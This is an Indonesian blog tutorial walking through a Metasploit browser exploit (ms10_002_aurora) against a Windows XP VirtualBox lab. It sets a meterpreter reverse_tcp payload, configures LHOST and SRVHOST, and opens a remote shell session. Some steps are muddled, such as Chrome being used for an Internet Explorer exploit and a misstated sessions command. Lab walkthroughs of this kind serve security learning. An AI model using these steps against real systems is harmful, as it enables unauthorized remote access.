Info BackTrack

Linux & Security Tutorial

Aurora Exploiting Metasploit


Sampul

Salam hangat buat para pembaca, langsung saja ya ke judul. Kali ini saya mau berbagi informasi tentang pemanfaatan exploit/windows/browser/ms10_002_aurora yang terdapat pada modul msf.

—Pengenalan

Aurora adalah eksploitasi berbasis browser. Aurora mengeksploitasi pada browser Internet Explorer ,tapi dalam hal ini saya menggunakan browser google crome pada vbox windows xp. Untuk lebih jelasnya, mari kita praktekan.

—Metasploit Console & Search Aurora

aurora1

aurora2

msf > search aurora

—Konfigurasi Serangan

aurora3

msf > use exploit/windows/browser/ms10_002_aurora
msf > set payload windows/meterpreter/reverse_tcp

—Melihat Informasi Options

aurora4

msf > show options

—Konfigurasi Target

Dalam hal ini saya menggunakan Lhost dari vbox0 sebagai target, contohnya bisa dilihat pada gambar di bawah ini.

aurora6

msf > set LHOST 192.168.56.1
msf > set SRVHOST 192.168.56.1
msf > set SRVHOST 192.168.56.1

Setelah itu mari kita lihat, apakah settingan diatas sudah pada tempatnya apa belum.

aurora7

Jika sudah, mari kita lakukan exploitnya

aurora8

Pada gambar diatas, saya menggunakan http://192.168.56.1:8080 (sesuai konfigurasi target yang anda lakukan).

Exploit is done.

—Meterpreter

Jika Exploitnya sudah sampai ke Opened, mari kita akses windowsnya.

aurora9

msf > sessions -l

aurora10

Pada gambar yang diatas, jika sessions anda tadinya kosong, maka langsung saja ke sessions -l 1 (punya saya disessions -l 2).

—Akses Windows
Nah, sekarang sudah masuk ke meterpreter. Untuk contoh meterpreter yang lain, bisa dilihat disini.
aurora11

aurora12

—done

greatz : Mama , Papa , dan Arina Aurora L Tobing

create by Lindo.

Sumber :  http://www.metasploit.com/modules/exploit/windows/browser/ms10_002_aurora

Artikel Terkait:

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: